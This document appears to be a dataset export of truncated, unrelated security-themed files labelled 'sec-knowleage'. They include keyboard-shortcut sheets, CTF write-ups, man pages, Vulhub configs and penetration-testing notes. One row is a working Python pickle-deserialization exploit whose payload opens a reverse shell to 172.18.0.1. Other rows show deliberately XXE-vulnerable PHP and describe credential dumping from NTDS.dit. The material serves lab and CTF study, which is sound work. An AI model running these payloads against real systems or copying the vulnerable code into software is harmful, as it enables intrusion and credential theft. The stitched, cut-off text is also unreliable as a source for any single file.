text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
---
title: Superhuman
date: 2022-11-23 16:23:31.694365
background: bg-[#6bafe2]
label: Mac
tags:
-
- mac
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 105 keyboard shortcuts found in Superhuman. This application is MacOS-only.
---
Keyboard Shortcuts
------------------
### Acti... | sec-knowleage |
# README
Category: Misc., 100 Points
## Description
> Readme
A zip file was attached.
## Solution
Let's check the attached file:
```console
┌──(user@kali)-[/media/sf_CTFs/checkpoint/README]
└─$ unzip readme.zip
Archive: readme.zip
extracting: key_checker_data
inflating: readme
inflating: solution_checker.py
```
... | sec-knowleage |
#!/usr/bin/env python3
import requests
import pickle
import os
import base64
class exp(object):
def __reduce__(self):
s = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.18.0.1",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno... | sec-knowleage |
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Login Page</title>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css" integrity="sha256-L/W5Wfqfa0sdBNIKN9cG6QA5F2qx4qICmU2VgLruv9Y=" crossorigin="anonymous">
<style>
.bd-plac... | sec-knowleage |
# T1003-003-windows-基于NTDS凭证转储2
## 来自ATT&CK的描述
攻击者可能试图访问或创建Active Directory域数据库的副本,以便窃取凭据信息,以及获取有关域成员(例如设备,用户和访问权限)的其他信息。默认情况下,NTDS文件(NTDS.dit)位于%SystemRoot%\NTDS\Ntds.dit域控制器中。
除了在活动的域控制器上查找NTDS文件之外,攻击者还可能搜索包含相同或相似信息的备份。
下列工具和技术可用于枚举NTDS文件和整个Active Directory哈希的内容。
- 卷影复制
- secretsdump.py
- 使用内置的Windows工具ntdsutil.exe
-... | sec-knowleage |
# 装的我脑血栓要犯了
---
## Crypto
以 python2 为例
先更新 pip
```
python2 -m pip install --upgrade pip
```
安装 Crypto
```
python2 -m pip install Crypto
```
安装 pycryptodome
```
python2 -m pip install pycryptodome
```
看下 `C:\Python27\Lib\site-packages\crypto` 是否有 `Cipher`、`Util`、`Hash`、`IO` 等文件夹
此时把 `C:\Python27\Lib\site-packages\crypto... | sec-knowleage |
.TH ZDRSCL 3 "15 June 2000" "LAPACK version 3.0"
.SH NAME
ZDRSCL \- 使用实数量 1/a 乘一个 n 维复向量
.SH "总览 SYNOPSIS"
.TP 19
SUBROUTINE ZDRSCL(
N, SA, SX, INCX )
.TP 19
.ti +4
INTEGER
INCX, N
.TP 19
.ti +4
DOUBLE
PRECISION SA
.TP 19
.ti +4
COMPLEX*16
SX( * )
.SH "目的 PURPOSE"
ZDRSCL 使实数量 1/a 与 n 维复向量相乘。只要最终结果 x/a 不会上溢或下溢,那么这个函数也不会... | sec-knowleage |
'\"
'\" Copyright (c) 1994 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: focusNext.n,v 1.2 2003/11/24 05:09... | sec-knowleage |
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH ZLESS 1
.SH 名称
zless \- 用于在显示器上阅读被压缩的文本文件的过滤器
.SH 概述
\fBzless\fP [ 文件名 ... ]
.SH 描述
\fIZless\fP ... | sec-knowleage |
<?php
$data = file_get_contents('php://input');
$xml = simplexml_load_string($data);
echo $xml->name; | sec-knowleage |
# Trump Trump (crypto 100)
###ENG
[PL](#pl-version)
In the task we get access to remote RSA signature service.
We also get a [picture](trump.jpg) we are supposed to sign with this service.
But the server refuses to sign this specific payload.
We can send some random payloads and check how it's signed since we know the ... | sec-knowleage |
ed
===
单行纯文本编辑器
## 补充说明
**ed命令** 是单行纯文本编辑器,它有命令模式(command mode)和输入模式(input mode)两种工作模式。ed命令支持多个内置命令,常见内置命令如下:
### 语法
```shell
ed(选项)(参数)
```
### 选项
```shell
A # 切换到输入模式,在文件的最后一行之后输入新的内容;
C # 切换到输入模式,用输入的内容替换掉最后一行的内容;
i # 切换到输入模式,在当前行之前加入一个新的空行来输入内容;
d # 用于删除最后一行文本内容;
n # 用于显示最后一行的行号和内容;
w # <文件名>:一给定的文件名保存当前正在编辑的文件;
... | sec-knowleage |
pvscan
===
扫描系统中所有硬盘的物理卷列表
## 补充说明
**pvscan命令** 会扫描系统中连接的所有硬盘,列出找到的物理卷列表。使用pvscan命令的`-n`选项可以显示硬盘中的不属于任何卷组的物理卷,这些物理卷是未被使用的。
### 语法
```shell
pvscan(选项)
```
### 选项
```shell
-d:调试模式;
-e:仅显示属于输出卷组的物理卷;
-n:仅显示不属于任何卷组的物理卷;
-s:短格式输出;
-u:显示UUID。
```
### 实例
使用pvscan命令扫描当前系统中所有硬盘的物理卷,在命令行中输入下面的命令:
```shell
[root@localhost ~]# ... | sec-knowleage |
# Buffering 2
Category: Binary Exploitation, 250 points
## Description
> The flag service is under maintenance, but I think we can still get the flag, care to check?
```c
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include "flag.h"
int get_credentials();
int authenticate_with_server(int *authenticated);... | sec-knowleage |
dmidecode
===
在Linux系统下获取有关硬件方面的信息
## 补充说明
**dmidecode命令** 可以让你在Linux系统下获取有关硬件方面的信息。dmidecode的作用是将DMI数据库中的信息解码,以可读的文本方式显示。由于DMI信息可以人为修改,因此里面的信息不一定是系统准确的信息。dmidecode遵循SMBIOS/DMI标准,其输出的信息包括BIOS、系统、主板、处理器、内存、缓存等等。
DMI(Desktop Management Interface,DMI)就是帮助收集电脑系统信息的管理系统,DMI信息的收集必须在严格遵照SMBIOS规范的前提下进行。SMBIOS(System Management... | sec-knowleage |
from Crypto.Util.number import *
p = getPrime(157)
q = getPrime(157)
n = p * q
e = 31415926535897932384
flag = open('flag').read().strip()
assert len(flag) == 50
m = int(flag.encode('hex'), 16)
c = pow(m, e, n)
print 'n =', n
print 'e =', e
print 'c =', c | sec-knowleage |
## pwn / c0py_pr073c710n (200+11p, 26 solves)
>Software piracy is a crime!
>Don’t steal our hard work.
>
>nc 104.154.90.175 54509
>[download](cat_flag.exe)
>
>HINT: 2.19-18+deb8u4
cat_flag.exe is x86-64 ELF binary with some code inside (marked as protected() routine) encrypted using AES-128-CBC. Mechanism is quite sim... | sec-knowleage |
### Use After Free原理
简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况
- 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。
- 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么**程序很有可能可以正常运转**。
- 内存块被释放后,其对应的指针没有被设置为NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,**就很有可能会出现奇怪的问题**。
而我们一般所指的 **Use After Free** ... | sec-knowleage |
version: '2'
services:
rmi:
build: .
ports:
- "1099:1099"
- "64000:64000"
environment:
- RMIIP=127.0.0.1 | sec-knowleage |
version: '2.2'
services:
jenkins:
image: vulhub/jenkins:2.46.1
init: true
ports:
- "50000:50000"
- "8080:8080" | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: error.n,v 1.2 2003/11/24 05:09:59 ... | sec-knowleage |
---
title: LaTeX
date: 2022-12-30 09:51:44
background: bg-[#2a338a]
tags:
categories:
- Programming
intro: |
This cheat sheet summarizes a reference list of [LaTeX](https://www.latex-project.org/) commonly used display math notation and some application examples of [KaTeX](https://katex.org/).
plugins:
- katex
... | sec-knowleage |
# Lahav 433 CTF - אתגר להב 433 - 2019
The challenge begins with the following text pasted to a pastebin:
```
MA==LA==MA==IA==NA==LA==NA==IA==NQ==LA==NA==IA==Ng==LA==NA==IA==Nw==LA==NA==IA==OA==LA==NA==IA==OQ==LA==NA==IA==MTA=LA==NA==IA==MTM=LA==NA==IA==MjA=LA==NA==IA==MjI=LA==NA==IA==MjM=LA==NA==IA==MjQ=LA==NA==IA==MjU... | sec-knowleage |
# Apache (HTTP Server) Common Bugs
## Introduction
What would you do if you came across a website that uses Apache (HTTP Server)?
## How to Detect
Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page
1. Find the related CVE by checking Apache (HTTP ... | sec-knowleage |
# XXL-JOB executor 未授权访问漏洞
XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。
参考链接:
- https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g
- https://landgrey.me/blog/18/
- https://github.com/OneSourceCat/X... | sec-knowleage |
# SunsetNoontide
> https://download.vulnhub.com/sunset/noontide.ova
靶场IP:`192.168.2.11`
扫描对外端口服务
```
┌──(root㉿kali)-[/tmp]
└─# nmap -p1-65535 -sV 192.168.2.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-05 10:46 EDT
Nmap scan report for 192.168.2.11
Host is up (0.000086s latency).
Not shown: 65532 closed tcp por... | sec-knowleage |
# ICSS (Misc/Crypto, 471p, 18 solved)
A blackbox crypto challenge.
We get a base64 encoded ciphertext `ypovStywDFkNEotWNc3AxtlL2IwWKuJA1qawdvYynITDDIpknntQR1gB+Nzl` and access to a service which can encrypt for us up to 6 characters of input.
First we need to understand how this encryption works, and for this we played... | sec-knowleage |
ip6tables
===
linux中防火墙软件
## 补充说明
**ip6tables命令** 和iptables一样,都是linux中防火墙软件,不同的是ip6tables采用的TCP/ip协议为IPv6。
### 语法
```shell
ip6tables(选项)
```
### 选项
```shell
-t<表>:指定要操纵的表;
-A:向规则链中添加条目;
-D:从规则链中删除条目;
-i:向规则链中插入条目;
-R:替换规则链中的条目;
-L:显示规则链中已有的条目;
-F:清楚规则链中已有的条目;
-Z:清空规则链中的数据包计算器和字节计数器;
-N:创建新的用户自定义规则链;
-P:定义规则链中的默认目标;
-... | sec-knowleage |
dd
===
复制文件并对原文件的内容进行转换和格式化处理
## 补充说明
**dd命令** 用于复制文件并对原文件的内容进行转换和格式化处理。dd命令功能很强大的,对于一些比较底层的问题,使用dd命令往往可以得到出人意料的效果。用的比较多的还是用dd来备份裸设备。但是不推荐,如果需要备份oracle裸设备,可以使用rman备份,或使用第三方软件备份,使用dd的话,管理起来不太方便。
建议在有需要的时候使用dd 对物理磁盘操作,如果是文件系统的话还是使用tar backup cpio等其他命令更加方便。另外,使用dd对磁盘操作时,最好使用块设备文件。
### 语法
```shell
dd(选项)
```
### 选项
```... | sec-knowleage |
## 一、本地文件包含
文件包含漏洞的产生原因是在通过引入文件时,由于传入的文件名没有经过合理的校验,或者校检被绕过,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。
比如 `<? include($_GET['path']) ?>`
许多工具都支持本地文件包含漏洞的检测,Kadimus是其中一款。具体使用方法参见[Kadimus](https://github.com/P0cL4bs/Kadimus/)
以下是一些本地包含漏洞中常利用的服务器上的重要文件
```
.htaccess
/var/lib/locate.db
/var/lib/mlocate/... | sec-knowleage |
# Hack Me Please
> https://download.vulnhub.com/hackmeplease/Hack_Me_Please.rar
靶场IP:`192.168.32.226`
扫描对外端口服务
```
┌──(root💀kali)-[~]
└─# nmap -p 1-65535 -sV 192.168.32.226 ... | sec-knowleage |
### User-kernal介绍
这里主要有
- 默认:用户态不可直接访问内核态的数据、执行内核态的代码
- SMEP:内核态不可执行用户态的代码
- SMAP:内核态不可访问用户态的数据
- KPTI:用户态不可看到内核态的页表;内核态不可执行用户态的代码(模拟) | sec-knowleage |
require 'openssl'
e = 65537
while true
p = OpenSSL::BN.generate_prime(1024, false)
q = OpenSSL::BN.new(e).mod_inverse(p)
next unless q.prime?
key = OpenSSL::PKey::RSA.new
key.set_key(p.to_i * q.to_i, e, nil)
File.write('publickey.pem', key.to_pem)
File.binwrite('flag.encrypted', key.public_encrypt(File.b... | sec-knowleage |
---
title: Apple Music
date: 2022-11-23 16:23:31.700157
background: bg-[#e05564]
label: Mac
tags:
-
- mac
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 62 keyboard shortcuts found in the Apple Music app. This application is MacOS-only.
---
Keyboard Shortcuts
------------------... | sec-knowleage |
# RSA (crypto, 300p)
In the challenge we get a [sage code](RSA.sagews) with some basic RSA encryption, and [a couple of messages and keys](message.txt).
Each modulus is large, and doesn't seem to be easily factorizable, but since we've a couple of them we can check if they don't share a prime via GCD - and they do.
Thi... | sec-knowleage |
# Atlassian Confluence Path Traversal and Command Execution Vulnerability (CVE-2019-3396)
[中文版本(Chinese version)](README.zh-cn.md)
Confluence is a web-based corporate wiki developed by Australian software company Atlassian.
An unauthorized directory traversal vulnerability exists before version 6.14.2 of Atlassian C... | sec-knowleage |
# PHP安全
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
**writeup**
- [BUUCTF WEB [RoarCTF 2019]Easy Calc](https://blog.csdn.net/qq_42967398/article/details/103512717)
- [安洵杯 2019 easy_web](https://www.btis.site/2020/08/01/%E5%AE%89%E6%B4%B5%E6%9D%AF-2019-easy-web/)
---
## PHP代码审计
- [PHP代码审计](./PHP... | sec-knowleage |
# NoSQL Injection
> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if t... | sec-knowleage |
# Beginner
Category: Reversing
> Dust off the cobwebs, let's reverse!
An executable was attached.
## Solution
Let's run the file:
```console
root@kali:/media/sf_CTFs/google/beginner# ./a.out
Flag: test
FAILURE
```
Looks like a simple program where we need to enter the flag.
Since `grep`, `strace` and `ptrace` don't sho... | sec-knowleage |
# Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)
Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞。相关分析如下:
- https://research.checkpoint.com/uncovering-drupalgeddon-2/
## 漏洞环境
执行如下命令启动drupal 8.5.0的环境:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080/`将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqli... | sec-knowleage |
## shellcode
给定一段 shellcode,执行并获取结果。
工具
====
- [shellcodeexec](https://github.com/inquisb/shellcodeexec)
题目
====
- Jarvis OJ - Basic - shellcode | sec-knowleage |
**注:**请多喝点热水或者凉白开,可预防**肾结石,通风**等。
痛风可伴发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。
### Pcalua简介:
Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。
**说明:**Pcalua.exe所在路径已被系统添加PATH环境变量中,因此,Pcalua命令可识别
Windows 7 默认位置:
```bash
C:\Windows\System32\pcalua.exe
```
**攻击机:** 192.168.1.4 Debian
**靶机:** 192.168.1.5 Windows 7
### 配置攻击机m... | sec-knowleage |
# DC 9
下载地址:https://download.vulnhub.com/dc/DC-9.zip
## 实战演练
靶场IP:`192.168.32.168`

扫描对外开放端口
```
┌──(root💀kali)-[~/Desktop]
└─# nmap -p1-65535 192.168.32.168 1 ⚙
Starti... | sec-knowleage |
# Awesome Security
[](https://github.com/sindresorhus/awesome)
A collection of awesome software, libraries, documents, books, resources and cool stuff about security.
Inspired by [awesome-php](https://github.... | sec-knowleage |
**注:**请多喝点热水或者凉白开,可预防**肾结石,通风**等。
痛风可伴发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。
**攻击机:**
192.168.1.5 Debian
**靶机:**
192.168.1.2 Windows 7
192.168.1.115 Windows 2003
192.168.1.119 Windows 2003
**第一季主要介绍scanner下的五个模块,辅助发现内网存活主机,分别为:**
* auxiliary/scanner/discovery/arp_sweep
* auxiliary/scanner/discovery/udp_sweep
* auxiliary/sc... | sec-knowleage |
# SSRF
## openStream
{% code title="SsrfController.java" %}
```java
package com.example.controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import java.io.BufferedReader;
import... | sec-knowleage |
---
title: CaseFile
categories: Information Gathering
tags: [information gathering,casefile,recon,kali linux,reporting]
date: 2020-10-12 22:14:00
---
CaseFile 包描述
-------------
CaseFile 是 Maltego 的弟弟。它本质上与 Maltego 是一样的图形应用程序,但不具备运行转换的能力。CaseFile 让你能够快速添加、链接和分析数据。该应用程序针对的是 "离线 "分析师这一独特的市场,这些人的主要信息来源不是从开源情报方面获得的,也不是可以通过程... | sec-knowleage |
<?php
$data = file_get_contents('php://input');
$xml = new SimpleXMLElement($data);
echo $xml->name; | sec-knowleage |
# GitLab 任意文件读取漏洞(CVE-2016-9086)
GitLab是一款Ruby开发的Git项目管理平台。在8.9版本后添加的“导出、导入项目”功能,因为没有处理好压缩包中的软连接,已登录用户可以利用这个功能读取服务器上的任意文件。
参考链接:
- https://about.gitlab.com/releases/2016/11/02/cve-2016-9086-patches/
- https://hackerone.com/reports/178152
- http://paper.seebug.org/104/
## 测试环境
执行如下命令启动一个GitLab Community Server 8.13... | sec-knowleage |
# Crazy repetition of codes (crypto, 326p, 45 solved)
In the challenge we get a [source code](crc.py) which would print the flag once it finishes.
However, if we inspect the code, we can see there are multiple loops of `range(int("1" * 10000))` and that's a bit too much for our computers.
The code is pretty simple -> e... | sec-knowleage |
# Thread Local Storage(TLS)
线程本地存储(TLS)用于在线程启动前对特定线程数据进行初始化, 因为每个进程都包含至少1个线程, 在主线程运行前初始化数据. 初始化操作可以通过指定一个已经复制到动态分配内存中去的静态缓冲区, 和/或通过在回调函数数组中执行代码, 来初始化动态内存内容. 经常是由于滥用回调函数数组而造成问题.
在运行时, TLS回调函数数组内容可以被修改或增加, 新加入或新修改的回调函数会使用新地址进行调用. 回调函数的数目也没有限制. 数组的扩展操作可以用以下代码完成:
``` asm
l1: mov d [offset cbEnd], offset l2
ret
l2: ...
... | sec-knowleage |
# WordPress Common Bugs
## Introduction
What would you do if you came across a website that uses WordPress?
## How to Detect
If you visit `https://target.com` and see the source code, you will see the links to themes and plugins from WordPress. Or you can visit `https://target.com/wp-login.php`, it is the WordPress log... | sec-knowleage |
# 多表代换加密
对于多表替换加密来说,加密后的字母几乎不再保持原来的频率,所以我们一般只能通过寻找算法实现对应的弱点进行破解。
## Playfair
### 原理
Playfair 密码(Playfair cipher or Playfair square)是一种替换密码,1854 年由英国人查尔斯·惠斯通(Charles Wheatstone)发明,基本算法如下:
1. 选取一串英文字母,除去重复出现的字母,将剩下的字母逐个逐个加入 5 × 5 的矩阵内,剩下的空间由未加入的英文字母依 a-z 的顺序加入。注意,将 q 去除,或将 i 和 j 视作同一字。
2. 将要加密的明文分成两个一组。若组内的字母相同,将 X(或 Q... | sec-knowleage |
# fscan
---
## 免责声明
`本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.`
---
**简介**
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。
**项目地址**
- https://github.com/shadow1ng/fscan
---
## 安装
**二进制文件下载**
```bash
wget https://github.com/shadow1ng/fscan/releases/download/1.8.1/fscan_amd64
mv fscan_amd64 fscan && mv --force fscan /usr/local/bin/... | sec-knowleage |
#!/usr/bin/env python
import SocketServer,threading,os,socket
from quantum import qubit, Alice, Bob
def recvuntil(s, until, maxlen=2048):
buf = ''
while until not in buf and len(buf) < maxlen:
tmp = s.recv(1)
if len(tmp) == 0:
raise socket.error
buf += tmp
return buf
class threadedserver(Sock... | sec-knowleage |
<?php
if (!empty($_FILES)):
// Check for errors
if($_FILES['file_upload']['error'] > 0){
die('An error ocurred when uploading.');
}
// Check filesize
if(!is_uploaded_file($_FILES['file_upload']['tmp_name'])) {
die('File is not uploaded file');
}
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENS... | sec-knowleage |
# T1033-系统所有者/用户发现
## 来自ATT&CK的描述
### windows
攻击者可能试图识别主要用户、当前登录用户、通常使用系统的用户集,或者用户是否正在积极使用系统。他们可以这样做,例如,通过检索帐户用户名或使用凭据转储。可以使用其他发现技术以多种不同的方式收集信息,因为用户和用户名详细信息在整个系统中都很常见,包括运行进程所有权、文件目录所有权、会话信息和系统日志。攻击者在自动发现期间使用来自系统所有者/用户发现的信息,来伪造后续行为,包括攻击者是否完全感染目标或尝试特定操作。
### MACos
在Mac上,当前登录的用户可以使用users,w和who来进行识别。
### linux
在Linux上,可以使用... | sec-knowleage |
# PHP 代码审计
## 文件包含
常见的导致文件包含的函数有:
- PHP:`include()`,`include_once()`,`require()`,`require_once()`,`fopen()`,`readfile()` 等
- JSP Servlet:`ava.io.File()`,`java.io.FileReader()` 等
- ASP:`includefile`,`includevirtual` 等
当 PHP 包含一个文件时,会将该文件当做 PHP 代码执行,而不会在意文件时什么类型。
### 本地文件包含
本地文件包含,Local File Inclusion,LFI。
```php
<?php
$... | sec-knowleage |
# 内存镜像法
内存镜像法是在加壳程序被加载时, 通过OD的`ALT+M`快捷键, 进入到程序虚拟内存区段. 然后通过加两次内存一次性断点, 到达程序正确OEP的位置.
内存镜像法的原理在于对于程序资源段和代码段下断点, 一般程序自解压或者自解密时, 会首先访问资源段获取所需资源, 然后在自动脱壳完成后, 转回程序代码段. 这时候下内存一次性断点, 程序就会停在OEP处.
## 要点
1. 选择菜单的`选项->调试选项->异常`
2. 勾选所有的忽略异常
3. 按下`ALT+M`, 打开内存镜像, 找到程序的第一个`.rsrc`, 按F2下断点, 然后按`SHIFT+F9`运行到断点
4. 再按`ALT+M`, 打开内存镜像, 找到... | sec-knowleage |
logout
===
退出当前登录的Shell
## 补充说明
**logout命令** 用于退出当前登录的Shell,logout指令让用户退出系统,其功能和login指令相互对应。
### 语法
```shell
logout
``` | sec-knowleage |
# Cobalt Strike
> Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malwar... | sec-knowleage |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Admin Page</title>
</head>
<body>
Congratulations, you are an admin!
</body>
</html> | sec-knowleage |
# 58.2 左旋转字符串
## 题目链接
[牛客网](https://www.nowcoder.com/practice/12d959b108cb42b1ab72cef4d36af5ec?tpId=13&tqId=11196&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github)
## 题目描述
将字符串 S 从第 K 位置分隔成两个子字符串,并交换这两个子字符串的位置。
```html
Input:
S="abcXYZdef"
K=3
Output:
"XYZdefabc"
```
## 解... | sec-knowleage |
# T1588-004-获取能力-数字证书
## 来自ATT&CK的描述
攻击者可能会购买和窃取SSL/TLS证书,以便在攻击目标过程中使用。SSL/TLS证书是为了灌输信任。它们包括关于密钥的信息,关于其所有者身份的信息,以及一个实体的数字签名,该实体已经验证了证书的内容是正确的。如果签名是有效的,并且检查证书的人信任签名者,那么他们就知道可以使用该钥匙与证书所有者进行通信。
攻击者可能会购买或窃取SSL/TLS证书,以推进他们的行动,如加密C2流量(例如:网络协议的非对称加密法),甚至启用中间人,如果证书被信任或以其他方式添加到信任根(即安装根证书)。数字证书的购买可以使用一个幌子组织,或使用从以前被攻破的实体中窃取的信息,使攻... | sec-knowleage |
# 46. 把数字翻译成字符串
[Leetcode](https://leetcode.com/problems/decode-ways/description/)
## 题目描述
给定一个数字,按照如下规则翻译成字符串:1 翻译成“a”,2 翻译成“b”... 26 翻译成“z”。一个数字有多种翻译可能,例如 12258 一共有 5 种,分别是 abbeh,lbeh,aveh,abyh,lyh。实现一个函数,用来计算一个数字有多少种不同的翻译方法。
## 解题思路
```java
public int numDecodings(String s) {
if (s == null || s.length() == 0)
... | sec-knowleage |
s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
def _l(idx, s):
return s[idx:] + s[:idx]
def decrypt(ct, k1, k2):
s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
t = [[_l((i + j) % len(s), s) for j in range(len(s))] for i in range(len(s))]
i1 = 0
i... | sec-knowleage |
# 对Starlink的测绘
## 了解网络架构
## 第三方数据
收集到Starlink的网段号为:
```bash
AS14593 - SPACEX-STARLINK - Space Exploration Technologies Corporation, US
```
## 确定测绘方案
## 测绘数据展示
## 有意思的发现 | sec-knowleage |
# PDB符号文件
---
**什么是 PDB 文件**
- PDB(Program Data Base),意即程序的基本数据,是 VS 编译链接时生成的文件。DPB 文件主要存储了 VS 调试程序时所需要的基本信息,主要包括源文件名、变量名、函数名、FPO(帧指针)、对应的行号等等。因为存储的是调试信息,所以一般情况下 PDB 文件是在 Debug 模式下才会生成。
- PDB 文件是在我们编译工程的时候产生的,它是和对应的模块 (exe 或 dll) 一起生成出来的。pdb 文件包含了编译后程序指向源代码的位置信息,用于调试的时候定位到源代码,主要是用来方便调试的。
PDB 文件中记录了源文件路径的相关信息,所以在载入 PDB ... | sec-knowleage |
# MySQL
---
**常用语句**
```sql
select group_concat(table_name) from information_schema.tables where table_schema=database()
```
查看 xxx 的字段
```sql
select group_concat(column_name) from information_schema.columns where table_name='xxx'
```
读取字段的内容
```sql
select flag from fl4g
```
---
## MySQL 系统库表
**information_schema**
MyS... | sec-knowleage |
### House of Lore概述
House of Lore 攻击与 Glibc 堆管理中的 Small Bin 的机制紧密相关。
House of Lore 可以实现分配任意指定位置的 chunk,从而修改任意地址的内存。
House of Lore 利用的前提是需要控制 Small Bin Chunk 的 bk 指针,并且控制指定位置 chunk 的 fd 指针。
### House of Lore基本原理
如果在 malloc 的时候,申请的内存块在 small bin 范围内,那么执行的流程如下
```c
/*
If a small request, check regular bin. Sin... | sec-knowleage |
# seed-sPRiNG
Binary Exploitation, 350 points
## Description:
> The most revolutionary game is finally available: seed sPRiNG is open right now!
## Solution:
Let's start by running the program:
```console
root@kali:/media/sf_CTFs/pico/seed-sPRiNG# ./seed_spring
# mmmmm mmmmm ... | sec-knowleage |
# L1im1tL355
Binary Exploitation, 400 points
## Description:
> Just pwn this program and get a flag.
```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define FLAG_BUFFER 128
void win() {
char buf[FLAG_BUFFER];
FILE *f = fopen("flag.txt","r");
fgets(buf,FLAG_BUFFER,f);
puts(buf);
fflush(stdout);... | sec-knowleage |
# T1095-非应用层协议
## 来自ATT&CK描述
攻击者可能使用非应用层协议在主机和C2服务器之间或网络中受感染的主机之间进行通信。存在可能被利用的协议列表很广泛。具体示例包括使用网络层协议,例如互联网控制消息协议 (ICMP),传输层协议,例如用户数据报协议 (UDP),会话层协议,例如安全套接字 (SOCKS),以及重定向/隧道协议,例如LAN上串行 (SOL)。
主机之间的ICMP通信就是一个示例。因为ICMP是Internet Protocol Suite的一部分,所以要求所有IP兼容的主机都实现它;然而,它不像TCP或UDP等其他Internet协议那样受到普遍监控,并且可能被攻击者用来隐藏通信。
## 检测
分析... | sec-knowleage |
# Wireshark软件包描述
Wireshark是世界上首屈一指的网络协议分析器,它可以让您在微观层面看到网络上发生的情况,事实上(常常是法律上)它是许多行业和教育机构的标准工具。感谢全球网络专家的贡献,Wireshark蓬勃发展。它是1998年开始的一个项目的延续。
Wireshark具有丰富的功能集,包括以下内容:
- 深入检查数百种协议,并且还一直在加入更多的内容
- 实时捕获和离线分析
- 标准的三窗格数据包浏览器
- 支持多平台:可以运行于Windows、Linux、OS X、Solaris、FreeBSD、NetBSD等系统
- 捕获的网络数据可以通过GUI或终端模式的TShark工具浏览
- 业界最强大的显示过滤器... | sec-knowleage |
'\" t
.TH "NSS\-RESOLVE" "8" "" "systemd 231" "nss-resolve"
.\" -----------------------------------------------------------------
.\" * Define some portability stuff
.\" -----------------------------------------------------------------
.\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.\" http://bug... | sec-knowleage |
---
title: Firewalk
categories: Information Gathering
tags: [information gathering,recon,kali linux,firewalk]
date: 2016-10-24 13:52:51
---
0x00 Firewalk介绍
-------------
Firewalk是一个主动的侦察网络安全工具,试图确定给定的IP转发设备将通过哪些第4层协议。Firewalk通过发送具有比目标网关更大的TTL的TCP或UDP数据包来工作。如果网关允许流量,则它将将分组转发到它们将到期的下一跳,并且引出ICMP_TIME_EXCEEDED消息。如果网关主机不允许流... | sec-knowleage |
-------
# 非常遗憾,停止更新。愿每一个安全从业者静有所思。----2019.3.7
-------
### 为什么要写 Micro8 系列
渗透攻击超十年,由于年龄,身体原因,自己感觉快要退出一线渗透攻击了。遂打算把毕生所学用文字表写出来。因为文章涉及到敏感的攻击行为,所以好多需要打马赛克,或者是本地以 demo 的形式表现出来。当这个行业做久了,你也终有一天发现原来事物的本质是如此重要。比如内网渗透的本质是信息搜集。当年某大佬把这条经验传递给我,同样,今天变成老家伙的我,也希望把这条经验传递下去。
